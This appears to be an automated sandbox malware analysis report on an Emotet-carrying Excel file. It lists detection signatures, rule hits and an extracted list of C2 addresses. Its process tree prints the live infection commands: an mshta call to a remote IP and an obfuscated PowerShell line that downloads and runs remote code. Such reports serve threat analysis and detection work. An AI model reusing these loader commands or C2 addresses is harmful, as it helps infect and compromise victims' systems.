Edit tour
Windows
Analysis Report
Attachment-2801.xls
Overview
General Information
Detection
Hidden Macro 4.0 Emotet
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Emotet
Multi AV Scanner detection for domain / URL
Sigma detected: Windows Shell File Write to Suspicious Folder
Document contains OLE streams with names of living off the land binaries
Powershell drops PE file
Sigma detected: MSHTA Spawning Windows Shell
Hides that the sample has been downloaded from the Internet (zone.identifier)
Document exploit detected (process start blacklist hit)
Sigma detected: Suspicious MSHTA Process Patterns
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Suspicious PowerShell Command Line
Found Excel 4.0 Macro with suspicious formulas
Obfuscated command line found
Machine Learning detection for dropped file
Sigma detected: Mshta Spawning Windows Shell
C2 URLs / IPs found in malware configuration
Drops PE files to the application program directory (C:\ProgramData)
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Document misses a certain OLE stream usually present in this Microsoft Office document type
Abnormal high CPU Usage
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
Searches for the Microsoft Outlook file path
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Found large amount of non-executed APIs
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to delete services
Creates a process in suspended mode (likely to inject code)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Potential document exploit detected (performs DNS queries)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Enables debug privileges
PE file contains an invalid checksum
Yara detected Xls With Macro 4.0
Connects to several IPs in different countries
Potential key logger detected (key state polling based)
Creates a window with clipboard capturing capabilities
Document contains embedded VBA macros
Potential document exploit detected (performs HTTP gets)
Classification
- System is w7x64
- EXCEL.EXE (PID: 1580 cmdline:
"C:\Progra m Files\Mi crosoft Of fice\Offic e14\EXCEL. EXE" /auto mation -Em bedding MD5: D53B85E21886D2AF9815C377537BCAC3) - cmd.exe (PID: 1188 cmdline:
CMD.EXE /c ms^hta ht tp://91.2^ 40.118.1^6 8/oo/aa/s^ e.ht^m^l MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41) - conhost.exe (PID: 2672 cmdline:
C:\Windows \system32\ conhost.ex e "1751206 246-156471 6110100522 0952792531 0865604186 26-2088535 704-136107 8821873267 499" MD5: CE476F23405AADC46039AC13127DF473) - rundll32.exe (PID: 2980 cmdline:
C:\Windows \SysWOW64\ rundll32.e xe "C:\Win dows\SysWO W64\Jgryag nlwd\cnso. vdd",fTwMf sDu MD5: 51138BEEA3E2C21EC44D0932C71762A8) - rundll32.exe (PID: 3048 cmdline:
C:\Windows \SysWOW64\ rundll32.e xe "C:\Win dows\SysWO W64\Jgryag nlwd\cnso. vdd",DllRe gisterServ er MD5: 51138BEEA3E2C21EC44D0932C71762A8) - rundll32.exe (PID: 836 cmdline:
C:\Windows \SysWOW64\ rundll32.e xe "C:\Win dows\SysWO W64\Iclyvf rvkfq\cpbs u.fzk",QAF iBTE MD5: 51138BEEA3E2C21EC44D0932C71762A8) - rundll32.exe (PID: 2712 cmdline:
C:\Windows \SysWOW64\ rundll32.e xe "C:\Win dows\SysWO W64\Iclyvf rvkfq\cpbs u.fzk",Dll RegisterSe rver MD5: 51138BEEA3E2C21EC44D0932C71762A8) - mshta.exe (PID: 2832 cmdline:
mshta http ://91.240. 118.168/oo /aa/se.htm l MD5: 95828D670CFD3B16EE188168E083C3C5) - powershell.exe (PID: 1944 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -noexit $c 1='({HgfRr tGdf}{HgfR rtGdf}Ne{H gfRrtGdf}{ HgfRrtGdf} w{HgfRrtGd f}-Obj{Hgf RrtGdf}ec{ HgfRrtGdf} {HgfRrtGdf }t N{HgfRr tGdf}{HgfR rtGdf}et{H gfRrtGdf}. W{HgfRrtGd f}{HgfRrtG df}e'.repl ace('{HgfR rtGdf}', ' '); $c4='b C{HgfRrtGd f}li{HgfRr tGdf}{HgfR rtGdf}en{H gfRrtGdf}{ HgfRrtGdf} t).D{HgfRr tGdf}{HgfR rtGdf}ow{H gfRrtGdf}{ HgfRrtGdf} nl{HgfRrtG df}{HgfRrt Gdf}{HgfRr tGdf}o'.re place('{Hg fRrtGdf}', ''); $c3= 'ad{HgfRrt Gdf}{HgfRr tGdf}St{Hg fRrtGdf}ri n{HgfRrtGd f}{HgfRrtG df}g{HgfRr tGdf}(''ht {HgfRrtGdf }tp{HgfRrt Gdf}://91. 240.118.16 8/oo/aa/se .png'')'.r eplace('{H gfRrtGdf}' , '');$JI= ($c1,$c4,$ c3 -Join ' ');I`E`X $ JI|I`E`X MD5: 852D67A27E454BD389FA7F02A8CBE23F) - cmd.exe (PID: 2396 cmdline:
"C:\Window s\system32 \cmd.exe" /c C:\Wind ows\SysWow 64\rundll3 2.exe C:\P rogramData \QWER.dll AADD MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41) - rundll32.exe (PID: 772 cmdline:
C:\Windows \SysWow64\ rundll32.e xe C:\Prog ramData\QW ER.dll AAD D MD5: 51138BEEA3E2C21EC44D0932C71762A8) - rundll32.exe (PID: 2992 cmdline:
C:\Windows \SysWOW64\ rundll32.e xe "C:\Pro gramData\Q WER.dll",D llRegister Server MD5: 51138BEEA3E2C21EC44D0932C71762A8) - rundll32.exe (PID: 2064 cmdline:
C:\Windows \SysWOW64\ rundll32.e xe "C:\Win dows\SysWO W64\Zefya\ nybbbfj.sg f",zLEpZ MD5: 51138BEEA3E2C21EC44D0932C71762A8) - rundll32.exe (PID: 1592 cmdline:
C:\Windows \SysWOW64\ rundll32.e xe "C:\Win dows\SysWO W64\Zefya\ nybbbfj.sg f",DllRegi sterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8) - rundll32.exe (PID: 944 cmdline:
C:\Windows \SysWOW64\ rundll32.e xe "C:\Win dows\SysWO W64\Wwjqkv ceadqbdjp\ jzkitex.dr d",DvusKnl RvE MD5: 51138BEEA3E2C21EC44D0932C71762A8) - rundll32.exe (PID: 292 cmdline:
C:\Windows \SysWOW64\ rundll32.e xe "C:\Win dows\SysWO W64\Wwjqkv ceadqbdjp\ jzkitex.dr d",DllRegi sterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8) - rundll32.exe (PID: 1188 cmdline:
C:\Windows \SysWOW64\ rundll32.e xe "C:\Win dows\SysWO W64\Xtqzug yhdvvax\if xy.nbi",UL uJOPPBfclL AtS MD5: 51138BEEA3E2C21EC44D0932C71762A8) - rundll32.exe (PID: 2672 cmdline:
C:\Windows \SysWOW64\ rundll32.e xe "C:\Win dows\SysWO W64\Xtqzug yhdvvax\if xy.nbi",Dl lRegisterS erver MD5: 51138BEEA3E2C21EC44D0932C71762A8)
- cleanup
{"C2 list": ["74.207.230.120:8080", "139.196.72.155:8080", "37.44.244.177:8080", "37.59.209.141:8080", "116.124.128.206:8080", "217.182.143.207:443", "54.37.228.122:443", "203.153.216.46:443", "168.197.250.14:80", "207.148.81.119:8080", "195.154.146.35:443", "78.46.73.125:443", "191.252.103.16:80", "210.57.209.142:8080", "185.168.130.138:443", "142.4.219.173:8080", "118.98.72.86:443", "78.47.204.80:443", "159.69.237.188:443", "190.90.233.66:443", "104.131.62.48:8080", "62.171.178.147:8080", "185.148.168.15:8080", "54.38.242.185:443", "198.199.98.78:8080", "194.9.172.107:8080", "85.214.67.203:8080", "66.42.57.149:443", "185.148.168.220:8080", "103.41.204.169:8080", "128.199.192.135:8080", "195.77.239.39:8080", "59.148.253.194:443"], "Public Key": ["RUNTMSAAAAD0LxqDNhonUYwk8sqo7IWuUllRdUiUBnACc6romsQoe1YJD7wIe4AheqYofpZFucPDXCZ0z9i+ooUffqeoLZU0", "RUNLMSAAAADYNZPXY4tQxd/N4Wn5sTYAm5tUOxY2ol1ELrI4MNhHNi640vSLasjYTHpFRBoG+o84vtr7AJachCzOHjaAJFCW"]}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
SUSP_Excel4Macro_AutoOpen | Detects Excel4 macro use with auto open / close | John Lambert @JohnLaTwC |
| |
JoeSecurity_XlsWithMacro4 | Yara detected Xls With Macro 4.0 | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
SUSP_Excel4Macro_AutoOpen | Detects Excel4 macro use with auto open / close | John Lambert @JohnLaTwC |
| |
JoeSecurity_XlsWithMacro4 | Yara detected Xls With Macro 4.0 | Joe Security | ||
JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security | ||
JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security | ||
JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security | ||
JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security | ||
JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security | ||
Click to see the 88 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security | ||
JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security | ||
JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security | ||
JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security | ||
JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security | ||
Click to see the 129 entries |
System Summary |
---|
Source: | Author: Florian Roth: |
Source: | Author: Michael Haag: |
Source: | Author: Florian Roth: |
Source: | Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: |
Source: | Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): |
Source: | Author: Florian Roth: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Click to jump to signature section
Show All Signature Results
AV Detection |
---|
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | URL Reputation: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: |
Source: | Malware Configuration Extractor: |
Source: | ReversingLabs: |
Source: | Virustotal: | Perma Link |
Source: | Joe Sandbox ML: |
Source: | File opened: |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: |
Source: | Code function: | ||
Source: | Code function: |
Software Vulnerabilities |
---|
Source: | Process created: |
Source: | TCP traffic: |
Source: | DNS query: |
Source: | TCP traffic: |
Networking |
---|
Source: | Snort IDS: |
Source: | IPs: | ||
Source: | IPs: | ||
Source: | IPs: | ||
Source: | IPs: | ||
Source: | IPs: | ||
Source: | IPs: | ||
Source: | IPs: | ||
Source: | IPs: | ||
Source: | IPs: | ||
Source: | IPs: | ||
Source: | IPs: | ||
Source: | IPs: | ||
Source: | IPs: | ||
Source: | IPs: | ||
Source: | IPs: | ||
Source: | IPs: | ||
Source: | IPs: | ||
Source: | IPs: | ||
Source: | IPs: | ||
Source: | IPs: | ||
Source: | IPs: | ||
Source: | IPs: | ||
Source: | IPs: | ||
Source: | IPs: | ||
Source: | IPs: | ||
Source: | IPs: | ||
Source: | IPs: | ||
Source: | IPs: | ||
Source: | IPs: | ||
Source: | IPs: | ||
Source: | IPs: | ||
Source: | IPs: | ||
Source: | IPs: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | HTTP traffic detected: |